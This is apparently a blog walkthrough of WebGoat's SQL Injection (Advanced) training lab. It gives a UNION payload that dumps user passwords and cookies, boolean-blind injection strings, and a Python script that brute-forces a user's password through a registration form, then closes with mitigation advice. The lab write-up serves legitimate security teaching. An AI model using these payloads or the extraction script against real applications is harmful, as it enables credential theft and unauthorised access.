Webgoat - SQL Injection (Advanced)

Webgoat – SQL Injection (Advanced)

In this walk through, we will be going through the SQL Injection (Advanced) vulnerability section from Webgoat Labs. We will be exploring and exploiting advanced SQL Injection and learn how application are affected because of it. So, let’s get started with the Hacking without any delay.

SQL Injection (Advanced)

1. Pulling data from other tables

  • In this challenge, we will use SQL injection payload to dump all the data from the tables.

1. Pulling data from other tables

Incorrect solution

  • I used the below payload to dump the another table from the DB.

Smith' UNION SELECT userid, user_name, password, cookie, null, null, null FROM user_system_data; -- -

Dumped all data

2. Login Bypass

  • In this challenge we have to bypass authentication and login as Tom.

2. Login Bypass

  • On every failed attempt the application is just showing a generic error message.

Login failed

  • I tried the below payload in user registration functionality and got a user already exist message. That means the field is vulnerable to sql injection as it had executed our query in background and displays a true statement.

tom' AND '1'='1

payload

  • Next we tried to test if the user password starts with string t and it confirms again with the TRUE Statement.

tom' AND substring(password,1,1)='t

User already exist

  • After this point, i also tried using sqlmap however got no luck. So used the below script to bruteforce the password manually with the help of the above payload and true statements.

import json  
import requests  
  
def sql_injection_advance_5():  
     alphabet_index = 0  
     alphabet = 'abcdefghijklmnopqrstuvwxyz'  
     password_index = 0  
     password = ''  
  
     headers = {  
        'Cookie': "JSESSIONID=5g5R4McsS89BVEPZyyuVpS_dOatOzBFP6Jy6qDa8"  
     }  
  
     while True:  
         payload = 'tom\' AND substring(password,{},1)=\'{}'.format(password_index + 1, alphabet[alphabet_index])  
  
         data = {  
             'username_reg': payload,  
             'email_reg': 'a@a',  
             'password_reg': 'a',  
             'confirm_password_reg': 'a'  
         }  
  
         r = requests.put('http://localhost/WebGoat/SqlInjectionAdvanced/challenge', headers=headers, data=data)  
  
         try:  
             response = json.loads(r.text)  
         except:  
             print("Wrong JSESSIONID, find it by looking at your requests once logged in.")  
             return  
  
         if "already exists please try to register with a different username" not in response["feedback"]:  
             alphabet_index += 1  
             if alphabet_index > len(alphabet) - 1:  
                 return  
         else:  
             password += alphabet[alphabet_index]  
             print(password)  
             alphabet_index = 0  
             password_index += 1  
  
sql_injection_advance_5()

  • Got the password and log in to complete the challenge.

python3 script.py

Challenge completed

3. The Quiz

3. The Quiz

3. The Quiz

Also Read: Webgoat – Spoofing an Authentication Cookie

Conclusion:

Conclusion

So, we finally completed the Webgoat SQL Injection (Advanced) Vulnerability section. Next, we can mitigate these types of attacks by performing input sanitization and using prepared statements or parametrized queries for every SQL query made by the application to the database. On that note, i will take your leave and will meet you in next one with another Webgoat vulnerability writeup, till then “Keep Hacking”.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top